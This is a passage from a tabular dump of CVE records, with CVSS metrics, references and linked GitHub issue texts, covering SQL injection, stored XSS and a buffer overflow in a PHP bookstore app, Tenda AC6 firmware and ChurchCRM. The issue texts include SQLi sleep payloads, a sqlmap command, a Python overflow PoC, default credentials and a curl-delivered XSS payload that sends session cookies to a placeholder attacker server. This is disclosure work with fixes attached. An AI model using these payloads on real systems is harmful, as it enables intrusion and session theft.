"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/NeoVuln/CVE/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.295076"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.295076"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.495183"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:1000projects:bookstore_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0449A3F-C6E8-468B-ABBC-9932801A9EEE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/NeoVuln/CVE/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"NeoVuln",
"CVE"
] | ### Vulnerability Details:
The `addtocart.php` in the Bookstore Management System from 1000 Projects is vulnerable to SQL injection.
### Vulnerability Reproduction:
The `bcid` parameter is not properly filtered and is directly concatenated into the SQL query, leading to a SQL injection vulnerability.

Log in using the account:
`dhaval/dhaval123`.

Click on any book to add it, and capture the `addtocart` API request.

Copy the request payload to a text file.
Payload:
`AND (SELECT 9017 FROM (SELECT(SLEEP(5)))hBgM)`

Successfully retrieved all database names.
### Fix Recommendation:
Use prepared statements for SQL queries to prevent SQL injection. | 1000 Projects Bookstore Management System SQL Injection | https://api.github.com/repos/NeoVuln/CVE/issues/1/comments | 1 | 2025-02-05T03:25:03Z | 2025-02-11T02:23:11Z | https://github.com/NeoVuln/CVE/issues/1 | 2,831,769,820 | 1 | 6,531 |
CVE-2025-1173 | 2025-02-11T05:15:13.530 | A vulnerability, which was classified as critical, was found in 1000 Projects Bookstore Management System 1.0. This affects an unknown part of the file process_users_del.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "MULTIPLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.4,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.1,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "HIGH",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://1000projects.org/"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/NeoVuln/CVE/issues/2"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.295077"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.295077"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.495309"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:1000projects:bookstore_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0449A3F-C6E8-468B-ABBC-9932801A9EEE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/NeoVuln/CVE/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"NeoVuln",
"CVE"
] | ### Vulnerability Description:
The `id` parameter is not properly filtered and is directly concatenated into the SQL query, leading to a SQL injection vulnerability.
Vulnerability Reproduction:
On the login page, select "Admin Login."

Log in to the admin panel using `admin/admin`, go to the "View Users" section, click on "Delete User," and capture the delete API request.

Payload: and+sleep(6)

Sqlmap:
sqlmap.py -r 1.txt –technique=T --batch –dbs

### Fix Recommendation:
Use prepared statements for SQL queries to prevent SQL injection.
Project URL/Address:https://1000projects.org/bookstore-management-system-php-mysql-project.html | Bookstore Management System process_users_del.php SQL Injection | https://api.github.com/repos/NeoVuln/CVE/issues/2/comments | 0 | 2025-02-05T07:44:43Z | 2025-02-11T02:23:00Z | https://github.com/NeoVuln/CVE/issues/2 | 2,832,167,592 | 2 | 6,532 |
CVE-2025-1174 | 2025-02-11T05:15:13.810 | A vulnerability has been found in 1000 Projects Bookstore Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file process_book_add.php of the component Add Book Page. The manipulation of the argument Book Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "MULTIPLE",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:M/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.4,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 2.4,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 0.9,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.7,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "HIGH",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "PASSIVE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Product"
],
"url": "https://1000projects.org/"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/NeoVuln/CVE/issues/3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.295078"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.295078"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.495318"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:1000projects:bookstore_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F0449A3F-C6E8-468B-ABBC-9932801A9EEE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/NeoVuln/CVE/issues/3 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"NeoVuln",
"CVE"
] | ### Vulnerability Description:
The **Bookstore Management System** backend **process_book_add.php** is vulnerable to **Stored XSS**.
### Vulnerability Reproduction:
Log in to the admin panel using the account **admin/admin**.
Go to **Book → Add Book** to add a new book.

After adding the book, trigger **XSS** in the backend at **Book → View Book** and on the frontend.


### Fix Recommendation:
Input Validation & Sanitization:
Properly validate and sanitize user inputs before storing them in the database.
Use functions like htmlspecialchars() or htmlentities() in PHP to encode special characters.
Output Escaping:
Escape output before rendering it on the page to prevent script execution.
Use frameworks’ built-in escaping functions, such as htmlspecialchars($data, ENT_QUOTES, 'UTF-8'). | 1000 Projects Bookstore Management System XSS_Stored | https://api.github.com/repos/NeoVuln/CVE/issues/3/comments | 1 | 2025-02-05T08:39:09Z | 2025-02-11T02:22:49Z | https://github.com/NeoVuln/CVE/issues/3 | 2,832,277,442 | 3 | 6,533 |
CVE-2025-25343 | 2025-02-12T19:15:22.003 | Tenda AC6 V15.03.05.16 firmware has a buffer overflow vulnerability in the formexeCommand function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/wy876/cve/issues/4"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:tenda:ac6_firmware:15.03.05.16:*:*:*:*:*:*:*",
"matchCriteriaId": "6F60AFD7-74AF-4CA2-8232-2858D5AD023A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:tenda:ac6:-:*:*:*:*:*:*:*",
"matchCriteriaId": "00830EE1-D0BB-462E-9F15-4E59560C14B8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
] | [
"120"
] | 120 | https://github.com/wy876/cve/issues/4 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"wy876",
"cve"
] | ## Tenda AC6 V15.03.05.16 firmware has a buffer overflow vulnerability in the formexeCommand function
- Firmware download website:
https://www.tenda.com.cn/material/show/102661
Tenda AC6 V15.03.05.16 firmware has a buffer overflow vulnerability in the `formexeCommand` function. The `strcpy(s, src)` function copies the contents of the `src` string to `s` without performing a boundary check. Therefore, if the length of `src` exceeds 512 bytes, it will cause a buffer overflow, overwriting the memory area after the` s` array, which may cause the program to crash and trigger this security vulnerability.

## poc
```python
import requests
# 构造溢出载荷
def create_payload():
# 假设 cmdinput 的目标缓冲区大小为 512 字节
buffer_size = 51200
# 填充 512 字节(覆盖 s 数组)
payload = b"A" * buffer_size
# 假设我们想覆盖 v11(4 字节,Little-endian 格式),填充目标数据
# 举例:将 v11 设置为 0xdeadbeef
v11_value = b"\xef\xbe\xad\xde"
# 将溢出数据和 v11_value 拼接
payload += v11_value
return payload
# 构造 HTTP 请求并发送
def send_payload(url, payload):
# 发送 GET 请求,带上恶意的 cmdinput 参数
params = {'cmdinput': payload}
response = requests.get(url, params=params)
response = requests.get(url, params=params)
# 打印响应内容
print("Response status code:", response.status_code)
print("Response body:", response.text)
if __name__ == "__main__":
# 目标 URL
url = "http://192.168.18.131/goform/exeCommand"
# 创建恶意载荷
payload = create_payload()
# 发送恶意请求
send_payload(url, payload)
```

| Tenda AC6 V15.03.05.16 firmware has a buffer overflow vulnerability in the formexeCommand function | https://api.github.com/repos/wy876/cve/issues/4/comments | 0 | 2025-01-07T10:56:25Z | 2025-01-07T10:56:25Z | https://github.com/wy876/cve/issues/4 | 2,772,534,723 | 4 | 6,534 |
CVE-2025-0981 | 2025-02-18T10:15:10.333 | A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to hijack a user's session by exploiting a Stored Cross Site Scripting (XSS) vulnerability in the Group Editor page. This allows admin users to inject malicious JavaScript in the description field, which captures the session cookie of authenticated users. The cookie can then be sent to an external server, enabling session hijacking. It can also lead to information disclosure, as exposed session cookies can be used to impersonate users and gain unauthorised access to sensitive information. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "YES",
"Recovery": "USER",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "HIGH",
"providerUrgency": "AMBER",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "LOW",
"userInteraction": "PASSIVE",
"valueDensity": "CONCENTRATED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:L/VA:H/SC:H/SI:L/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:L/U:Amber",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "LOW"
},
"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce",
"type": "Secondary"
}
]
} | [
{
"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ChurchCRM/CRM/issues/7245"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*",
"matchCriteriaId": "552A51B0-B2AE-4A12-BF43-DDCE1D8A29D2",
"versionEndExcluding": null,
"versionEndIncluding": "5.13.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/ChurchCRM/CRM/issues/7245 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ChurchCRM",
"CRM"
] |
#### **Severity:**
🔴 **High** (CWE-287: Improper Authentication)
- ___A CVE will be assigned once the ChurchCRM team reviews the issue (CVE-2025-0981)___
#### **Authorization Required**
- Administrator
#### **Description**
A vulnerability exists in **ChurchCRM** that allows an attacker to hijack a user's session by exploiting a Stored Cross Site Scripting (XSS) vulnerability in the **Group Editor**. This allows admin users to inject malicious JavaScript, which captures the session cookie of authenticated users. The cookie can then be sent to an external server, enabling session hijacking.
## Simple Payload - Reflected Session Cookies
#### **Affected Asset:**
- `http://<server_ip>/GroupEditor.php?GroupID=7`
- `http://<server_ip>/api/groups/7`
#### **Steps to Reproduce:**
1. Go to the Group Editor URL: `http://<server_ip>/GroupEditor.php?GroupID=7`.
2. Modify the `description` field with the following XSS payload:
```javascript
<script>alert(document.cookie)</script>
```
3. Submit the form, triggering the XSS vulnerability.
4. View the group details by navigating to:
`http://<server_ip>/GroupView.php?GroupID=7`
5. Observe that the session cookie is stolen via an alert box (in the case of simple XSS).
#### **Proof of Concept (PoC):**
**Simple Payload:**
Injecting an XSS payload to steal the session cookie.
```bash
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: <server_ip>' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/json; charset=utf-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 132' -H $'Origin: http://<server_ip>' -H $'Connection: keep-alive' -H $'Referer: http://<server_ip>/GroupEditor.php?GroupID=7' -H $'sec-ch-ua-platform: "Windows"' -H $'sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"' -H $'sec-ch-ua-mobile: ?0' -H $'Priority: u=0' \
-b $'<CRM-COOKIE>' \
--data-binary $'{\"groupName\":\"Boys Scouts\",\"description\":\"<script>alert(document.cookie)</script>\\n\",\"groupType\":\"0\"}' \
$'http://<server_ip>/api/groups/7'
```
**Observed Response:**
Once the group details are viewed, the injected script will execute, potentially revealing the session cookie in an alert box.
---
## Advanced Payload - Session Hijacking
**Advanced Payload:**
Exploiting the vulnerability to steal the session cookie by sending it to an attacker-controlled server.
```javascript
<img src="nonexistent.jpg" onerror="window.location.href='<attacker_server>/?c='+document.cookie">
```
**Request:**
```bash
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: <server_ip>' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: application/json; charset=utf-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 205' -H $'Origin: http://<server_ip>' -H $'Connection: keep-alive' -H $'Referer: http://<server_ip>/GroupEditor.php?GroupID=7' -H $'sec-ch-ua-platform: "Windows"' -H $'sec-ch-ua: "Google Chrome";v="117", "Chromium";v="117", "Not=A?Brand";v="24"' -H $'sec-ch-ua-mobile: ?0' -H $'Priority: u=0' \
-b $'<CRM-COOKIE>' \
--data-binary $'{\"groupName\":\"Boys Scouts\",\"description\":\"<img src=\\\"nonexistent.jpg\\\" onerror=\\\"window.location.href=\'<attacker_server>/?c=\' + document.cookie\\\">\",\"groupType\":\"0\"}' \
$'http://<server_ip>/api/groups/7'
```
**Observed Response:**
Once the group details are viewed, the injected script will execute, sending the session cookies to the attacker's server in the background. The attacker can either automate the authentication or manually authenticate as the user now.
---
#### **Impact:**
- **Session Hijacking**: The attacker can gain access to an authenticated user's session by capturing their session cookie.
- **Information Disclosure**: Exposing session cookies can allow attackers to impersonate users and gain unauthorized access to sensitive information.
- **Cross-Site Scripting (XSS)**: The vulnerability is a classic case of stored XSS, which can be exploited by attackers to inject arbitrary JavaScript into the web application.
#### **Recommended Fix:**
- Implement **output encoding** to prevent malicious script injection in user-controlled input fields.
- Ensure that session cookies are set with the **`HttpOnly`** and **`Secure`** flags to protect them from client-side access.
- Validate and sanitize user input before reflecting it in web pages.
#### **Environment:**
- **Application:** ChurchCRM 5.13.0
- **Tested on:** Provided Docker in release
| Bug: (CVE-2025-0981) - Session Hijacking via Stored Cross-Site Scripting (XSS) in Group Editor | https://api.github.com/repos/ChurchCRM/CRM/issues/7245/comments | 3 | 2025-02-03T10:29:17Z | 2025-04-21T02:58:54Z | https://github.com/ChurchCRM/CRM/issues/7245 | 2,827,107,053 | 7,245 | 6,535 |
CVE-2025-1023 | 2025-02-18T10:15:10.500 | A vulnerability exists in ChurchCRM 5.13.0 and prior that allows an attacker to execute arbitrary SQL queries by exploiting a time-based blind SQL Injection vulnerability in the EditEventTypes functionality. The newCountName parameter is directly concatenated into an SQL query without proper sanitization, allowing an attacker to manipulate database queries and execute arbitrary commands, potentially leading to data exfiltration, modification, or deletion. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "YES",
"Recovery": "USER",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 9.3,
"baseSeverity": "CRITICAL",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "HIGH",
"providerUrgency": "RED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "LOW",
"userInteraction": "NONE",
"valueDensity": "CONCENTRATED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:L/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:C/RE:H/U:Red",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "HIGH"
},
"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce",
"type": "Secondary"
}
]
} | [
{
"source": "b7efe717-a805-47cf-8e9a-921fca0ce0ce",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/ChurchCRM/CRM/issues/7246"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*",
"matchCriteriaId": "552A51B0-B2AE-4A12-BF43-DDCE1D8A29D2",
"versionEndExcluding": null,
"versionEndIncluding": "5.13.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/ChurchCRM/CRM/issues/7246 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"ChurchCRM",
"CRM"
] | #### **Severity:**
⚫ **Critical** (CWE-89: Improper Neutralization of Special Elements used in an SQL Command)
- ___A CVE will be assigned once the ChurchCRM team reviews the issue (CVE-2025-1023)___
#### **Authorization Required**
